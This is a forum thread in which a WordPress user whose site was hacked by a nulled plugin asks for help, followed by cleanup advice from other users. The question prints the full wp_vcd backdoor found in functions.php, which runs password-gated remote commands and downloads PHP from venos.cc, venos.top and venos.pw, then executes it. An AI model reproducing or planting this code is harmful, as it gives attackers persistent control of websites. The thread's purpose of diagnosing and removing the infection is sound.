# My Wordpress website was hacked

Tags: plugins, hacked, troubleshooting, virus

Today while working, I had tried to install **Go Pricing** Plugin from this website.

```
https://www.downloadfreethemes.download/go-pricing-v3-3-8-wordpress-responsive-pricing-tables/
```

It was unsuccessful at the first time then I tried for several times but no result. then after some time, my website went blank. I searched for Xampp errors, tried to deactivate plugins from the database(I could not access admin nor frontend)

Then finally, I have found this code in **function.php**

Is it something I have to worry? Is there any place where I can still find this code on my WordPress?

Now I have removed this code from **function.php** and website is working fine but I am afraid if my passwords and other things uploading somewhere.

Is there something i have to remove?

```
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'b08494ffce10b7c547993599bd7deb9e'))
{
    $div_code_name="wp_vcd";

    switch ($_REQUEST['action'])
    {
        case 'change_domain';
            if (isset($_REQUEST['newdomain']))
            {
                if (!empty($_REQUEST['newdomain']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                        {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
          break;

        case 'change_code';
            if (isset($_REQUEST['newcode']))
            {
                if (!empty($_REQUEST['newcode']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                        {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
          break;

        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;

if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key='322f4f8d2d11134e9bedae0c97257b9d';
        if (($tmpcontent = @file_get_contents("http://www.venos.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.venos.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

     if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.venos.pw/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos.pw/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
    }
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
```

Comment: Moral: Do ever never install nulled plugins or themes in your website.
Glad you have regained access to your website, you should backup your database, change your passwords. Install [Wordfence Security](https://wordpress.org/plugins/wordfence/) plugin and do a full scan. Good luck!

Answer (score 3, accepted):

It's good that you've regained access to your website, but without any further action, you'll get hacked again. These are steps to take, in order to clean, and secure your site:

1. do not panic ( very important )
2. do not remove anything yourself
3. install and activate [WordFence Security](https://wordpress.org/plugins/search/wordfence/) plugin
4. in *Wordfence -> Options*, select everything to scan
5. run *Wordfence -> Scan*, and follow instructions provided
6. repeat step 5, until the scan shows no problems
7. setup firewall in Wordfence
8. make a full backup of your site, and remember to do it frequently

If the above procedure does not work at any stage, hire a professional!

**Note:** it is possible, that the plugin, you've attempted to install, caused this infection. Be very careful installing plugins from unknown sources. Try first, to search for plugins, in the official WordPress repository.

Comment: WordFence does not clean (or detect infections in) plugins, is that still correct?

Comment: @janh Wordfence will compare all plugins and themes ( except premium ones ) with WordPress repository, allowing to revert changes. I've helped to clean numerous websites, using this procedure.

Comment: Thanks, that's good to know. I've just checked it myself after not having used WF quite a while and it did indeed detect changed in Plugin files.

Comment: Installing "security" plugins **after** you have been infected is pointless in regard to keeping the site clean. Depending on how talented the hacker was you might never be able to find the backdoors that he left. The only proper way to recover is to use a backup which is known to be good, after that you can install "security" plugins, not before.

Comment: ... this one for example will leave a backdoor in wp-includes and your active theme folder, and while the first might be detected by "security" plugin, base on WP checksums, the second will not unless you are using a theme from the repository which you haven't modified in any way.

Answer (score 2):

This occurs by using NULLED themes and plugins

You have to know that everything nulled is contaminated by malicious code.

When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in functions.php and adding several files en wp-includes or wp-admin.

wp-vcd.php

wp-tmp.php

AND ALSO modifies

post.php

functions.php

Comment: also modifies code in various plugin files, with similar or identical code that shows up in theme functions.php.

Answer (score 0):

I never install plugins that come from non-WP-repository sources. Just not worth it, IMHO.

That said, you should uninstall the plugin, then delete it, then make sure the plugin folder is deleted. I would also reinstall WP core, and all themes (remove any plugins/themes that you do not use). I have not used WordFence, so cannot comment on it.

But I have cleaned up some sites, and wrote up a guide for that [here](http://securitydawg.com/recovering-from-a-hacked-wordpress-site/) that might be helpful. Some would say 'nuke from orbit', but I've found that the things mentioned in my guide work just fine ... at least in the sites that I have cleaned up.

Good luck!

Answer (score 0):

I had the same issue and fixed by doing the below steps:

1. Delete extra code from the "wp-includes/post.php" eg:

```
   if (file_exists(dirname(__FILE__) . '/wp-vcd.php'))

     include_once(dirname(__FILE__) . '/wp-vcd.php');
```

2. Delete 2 files: "wp-includes/wp-tmp.php" & "wp-includes/wp-vcd.php"
3. Open "themes/your theme [parent & child ]/functions.php" and delete injected code.
4. remove from "mysqlM"

PLEASE DON'T DOWNLOAD/INSTALL FROM THIRD-PARTY PLUGIN HACKER/PROVIDERS "They are actual MF"

Hope this will help someone.